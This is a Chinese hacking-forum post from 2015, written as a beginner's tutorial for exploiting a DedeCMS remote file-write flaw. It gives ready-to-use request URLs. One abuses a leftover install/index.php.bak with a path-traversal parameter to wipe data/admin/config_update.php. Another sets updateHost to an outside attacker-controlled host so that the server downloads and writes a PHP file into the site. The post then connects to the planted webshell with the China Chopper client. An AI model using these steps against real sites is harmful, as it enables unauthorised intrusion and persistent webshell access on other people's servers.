搜索
查看: 809|回复: 1

Dedecms远程写文件漏洞和利用方法

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2015-7-22 19:59:12 | 显示全部楼层 |阅读模式
转载备份


首先这个漏洞呢是上个月国外公布,虽然已经公布了但是我想可能有些人还不知道或者不会利用,在下就来做个利用教程  照顾一下新手  


分析地址https://www.chinabaiker.com/thread-2119-1-1.html


服务器的环境必须要是 阿帕奇 的  因为次漏洞利用了阿帕奇的解析漏洞

漏洞文件 :
1:install/index.php.bak
2:install/index.php
安装文件有两个
下面呢我找了一个网站给大家演示





Xxx.com/install/index.php.bak


文件存在  

接下来就是清空config_update.php的内容
Xxx.com/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php  

就是把http://updatenew.dedecms.com/base-v57/dedecms/demodata.a.txt 这里面的内容写入xxx.com/data/admin/config_update.php




远程获取失败就是http://updatenew.dedecms.com/base-v57/dedecms/demodata.a.txt 的文件不存在  






接下来就开始写指定内容了  

Xxx.com/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../sss1.php&updateHost=http://locett.xyz/




存在 就是http://locett.xyz//dedecms/demodata.a.txt存在




大家可能会问http://locett.xyz/
是啥   因为他要写url/dedecms/demodata.a.txt里面的内容进去   所以我们指定网址http://locett.xyz/


他就会写http://locett.xyz//dedecms/demodata.a.txt里面的内容   



接下来我们看一下是写入成功

OK  菜刀连接

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?Join BUC

x
过段时间可能会取消签到功能了
菜鸟痕迹 该用户已被删除
发表于 2015-7-23 21:39:22 | 显示全部楼层
好像还不错的样子呢。。。。
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表